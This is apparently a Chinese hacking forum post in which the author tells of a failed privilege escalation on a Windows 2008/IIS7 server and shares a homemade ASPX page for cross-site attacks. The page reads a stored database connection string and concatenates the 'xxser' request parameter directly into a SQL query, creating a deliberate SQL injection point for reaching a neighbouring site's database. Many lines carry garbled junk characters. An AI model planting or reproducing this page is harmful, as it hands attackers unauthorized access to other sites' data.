利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
, d: |5 T8 X8 [/ z8 k- A代码量不多，自己写个拉倒了。烦死了。

4 e) a! E9 v* w4 r/ J  l​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
& O3 J5 X8 l9 i9 {<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
2 @  N  y& n0 E% B' m( z* |" O; t9 g<body>
    <form id="form1" runat="server">
: ^( S" [- c/ N# G! o5 k    <div>
     <script language="c#" runat="server">
" _, X% ?" e$ W8 a& Y            
  G* {: S5 _" W         void page_init(object sender, EventArgs e)
         {
3 n! i* w% ~- V6 ]            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
# v  ^& W) P# J1 k( n            
7 E% e8 {* h- H  h$ F* Z  |8 H% b             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
            
9 a9 A! y, X* j0 k  ~- `             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
; I* W3 j) S  ?% A) D* Y$ ?3 a$ [. N             Response.Write(i+"\n");
             Response.Write(x);
6 p3 }/ C& o% ?6 t$ [# K             conn.Close();
         }
0 P4 N+ e! c0 l& G: S/ T     
  </script>
7 L6 Z: S( n4 \% Y. |    </div>
! s, h* L9 A6 p1 i    </form>
</body>
( l5 A- `0 j6 z6 f9 H% D' m0 Y</html>
/ {% M/ z( e, G+ P* j